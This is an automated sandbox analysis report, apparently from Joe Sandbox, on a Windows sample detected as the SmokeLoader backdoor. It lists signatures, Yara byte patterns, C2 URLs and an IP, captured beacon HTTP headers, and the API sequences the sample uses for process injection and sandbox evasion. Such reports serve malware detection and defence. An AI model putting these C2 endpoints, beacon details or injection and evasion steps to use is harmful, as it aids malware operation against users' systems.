Windows Analysis Report
01885599.exe

Overview

General Information

Sample Name: 01885599.exe
Analysis ID: 876999
MD5: a29c587c678826f4a44cf6a2a78599f1
SHA1: 92ea36730fa1f19300a27ebbb4d1359e7b8a16de
SHA256: b3fbcfd775b7c9bfc5b58f5df13eb8fbeb4844d98756f8fca41b63f060ae5132

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 01885599.exe (PID: 6936 cmdline: C:\Users\user\Desktop\01885599.exe MD5: A29C587C678826F4A44CF6A2A78599F1)
    • 01885599.exe (PID: 6956 cmdline: C:\Users\user\Desktop\01885599.exe MD5: A29C587C678826F4A44CF6A2A78599F1)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • vbjjhwi (PID: 6476 cmdline: C:\Users\user\AppData\Roaming\vbjjhwi MD5: A29C587C678826F4A44CF6A2A78599F1)
    • vbjjhwi (PID: 6468 cmdline: C:\Users\user\AppData\Roaming\vbjjhwi MD5: A29C587C678826F4A44CF6A2A78599F1)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution:
  • SMOKY SPIDER
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Extracted configuration: {"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
Yara matches in memory dumps (Source | Rule | Description | Author; matched strings below each entry):
  • 00000005.00000002.622842996.00000000006B8000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
    • 0x7ae9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
  • 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
  • 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
    • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
  • 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
  • 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
    • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0

Yara matches in unpacked PE files (Source | Rule | Description | Author):
  • 1.2.01885599.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
  • 5.2.vbjjhwi.8215a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
  • 6.2.vbjjhwi.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
  • 0.2.01885599.exe.7f15a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
Source: 01885599.exe | Virustotal: Detection: 37%
Source: http://host-host-file8.com/ | URL Reputation: Label: malware
Source: host-file-host6.com | Virustotal: Detection: 22%
Source: host-host-file8.com | Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Roaming\vbjjhwi | ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Virustotal: Detection: 37%
Source: 01885599.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Joe Sandbox ML: detected
Source: 01885599.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | source: explorer.exe, 00000003.00000000.569751105.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: MHC:\nodiga.pdb | source: 01885599.exe, vbjjhwi.3.dr
Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb | source: explorer.exe, 00000003.00000000.569751105.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: C:\nodiga.pdb | source: 01885599.exe, vbjjhwi.3.dr
Source: Binary string: eex.pdb | source: explorer.exe, 00000003.00000000.569751105.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA

Networking

Source: C:\Windows\explorer.exe | Domain query: host-file-host6.com
Source: C:\Windows\explorer.exe | Domain query: host-host-file8.com
Source: C:\Windows\explorer.exe | Network Connect: 194.50.153.68 80
Source: Malware configuration extractor | URLs: http://host-file-host6.com/
Source: Malware configuration extractor | URLs: http://host-host-file8.com/
Source: Joe Sandbox View | ASN Name: GAZ-IS-ASRU
Source: Joe Sandbox View | IP Address: 194.50.153.68
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://oncejkc.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 218
  Host: host-file-host6.com
Source: explorer.exe, 00000003.00000000.570166430.00007FF883839000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
Source: explorer.exe, 00000003.00000000.570166430.00007FF883839000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
Source: unknown | HTTP traffic detected:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://oncejkc.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 218
  Host: host-file-host6.com
Source: unknown | DNS traffic detected: queries for: host-file-host6.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 1.2.01885599.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbjjhwi.8215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.vbjjhwi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.01885599.exe.7f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: 01885599.exe, 00000000.00000002.530524455.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Source: 00000005.00000002.622842996.00000000006B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.530540948.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.622842996.00000000006B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.530540948.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_004118DE
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_0040A4AA
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_0041251A
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_004132E1
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_0041139A
Source: C:\Users\user\Desktop\01885599.exe | Code function: String function: 00407404 appears 35 times
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_007F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess
Source: C:\Users\user\Desktop\01885599.exe | Code function: 1_2_0040180C Sleep,NtTerminateProcess
Source: C:\Users\user\Desktop\01885599.exe | Code function: 1_2_00401818 Sleep,NtTerminateProcess
Source: C:\Users\user\Desktop\01885599.exe | Code function: 1_2_00401822 Sleep,NtTerminateProcess
Source: C:\Users\user\Desktop\01885599.exe | Code function: 1_2_00401826 Sleep,NtTerminateProcess
Source: C:\Users\user\Desktop\01885599.exe | Code function: 1_2_00401834 Sleep,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 5_2_00820110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 6_2_0040180C Sleep,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 6_2_00401818 Sleep,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 6_2_00401822 Sleep,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 6_2_00401826 Sleep,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 6_2_00401834 Sleep,NtTerminateProcess
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
Source: 01885599.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vbjjhwi.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 01885599.exe | Virustotal: Detection: 37%
Source: C:\Users\user\Desktop\01885599.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\01885599.exe C:\Users\user\Desktop\01885599.exe
Source: C:\Users\user\Desktop\01885599.exe | Process created: C:\Users\user\Desktop\01885599.exe C:\Users\user\Desktop\01885599.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\vbjjhwi C:\Users\user\AppData\Roaming\vbjjhwi
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Process created: C:\Users\user\AppData\Roaming\vbjjhwi C:\Users\user\AppData\Roaming\vbjjhwi
Source: C:\Users\user\Desktop\01885599.exe | Process created: C:\Users\user\Desktop\01885599.exe C:\Users\user\Desktop\01885599.exe
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Process created: C:\Users\user\AppData\Roaming\vbjjhwi C:\Users\user\AppData\Roaming\vbjjhwi
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\vbjjhwi
Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/3@4/1
Source: C:\Users\user\Desktop\01885599.exe | Command line argument: T#0y (0_2_00403FE0)
Source: C:\Users\user\Desktop\01885599.exe | Command line argument: #"# (0_2_00403FE0)
Source: C:\Users\user\Desktop\01885599.exe | Command line argument: .d|1 (0_2_00403FE0)
Source: C:\Users\user\Desktop\01885599.exe | Command line argument: K[ (0_2_00403FE0)
Source: C:\Users\user\Desktop\01885599.exe | Command line argument: ZBE (0_2_00403FE0)
Source: C:\Users\user\Desktop\01885599.exe | Command line argument: kernel32.dll (0_2_00403FE0)
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
Source: 01885599.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 01885599.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 01885599.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 01885599.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 01885599.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 01885599.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 01885599.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Source: C:\Users\user\Desktop\01885599.exe | Unpacked PE file: 1.2.01885599.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Unpacked PE file: 6.2.vbjjhwi.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_00407449 push ecx; ret 0_2_0040745C
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_00403770 push ecx; mov dword ptr [esp], 00000000h 0_2_00403771
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_007F1977 push ebx; iretd 0_2_007F19B7
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_007F1970 push ebx; iretd 0_2_007F19B7
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_007F198B push ebx; iretd 0_2_007F19B7
Source: C:\Users\user\Desktop\01885599.exe | Code function: 1_2_004011D0 push ebx; iretd 1_2_00401217
Source: C:\Users\user\Desktop\01885599.exe | Code function: 1_2_004011D7 push ebx; iretd 1_2_00401217
Source: C:\Users\user\Desktop\01885599.exe | Code function: 1_2_004011EB push ebx; iretd 1_2_00401217
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 5_2_0082198B push ebx; iretd 5_2_008219B7
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 5_2_00821970 push ebx; iretd 5_2_008219B7
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 5_2_00821977 push ebx; iretd 5_2_008219B7
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 6_2_004011D0 push ebx; iretd 6_2_00401217
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 6_2_004011D7 push ebx; iretd 6_2_00401217
Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 6_2_004011EB push ebx; iretd 6_2_00401217
Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_0040D6B0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
Source: initial sample | Static PE information: section name: .text entropy: 7.581715328183715 (2 identical entries)
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\vbjjhwi (2 identical entries)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\01885599.exe
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\vbjjhwi:Zone.Identifier read attributes | delete
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (12 identical entries)

              Malware Analysis System Evasion

              barindex
              Source: vbjjhwi, 00000006.00000002.633709015.00000000005EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Windows\explorer.exe TID: 860Thread sleep count: 505 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 640Thread sleep count: 300 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 640Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 4628Thread sleep count: 187 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 3728Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 6600Thread sleep count: 516 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6588Thread sleep count: 203 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6584Thread sleep count: 248 > 30Jump to behavior
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 505
              Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 516
              Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 850
              Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 867
              Source: C:\Users\user\Desktop\01885599.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA (0_2_00403870)
              Source: C:\Users\user\Desktop\01885599.exe | System information queried: ModuleInformation
              Source: explorer.exe, 00000003.00000000.551747489.000000000830B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
              Source: explorer.exe, 00000003.00000000.551747489.000000000834F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
              Source: explorer.exe, 00000003.00000000.547717895.00000000059F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
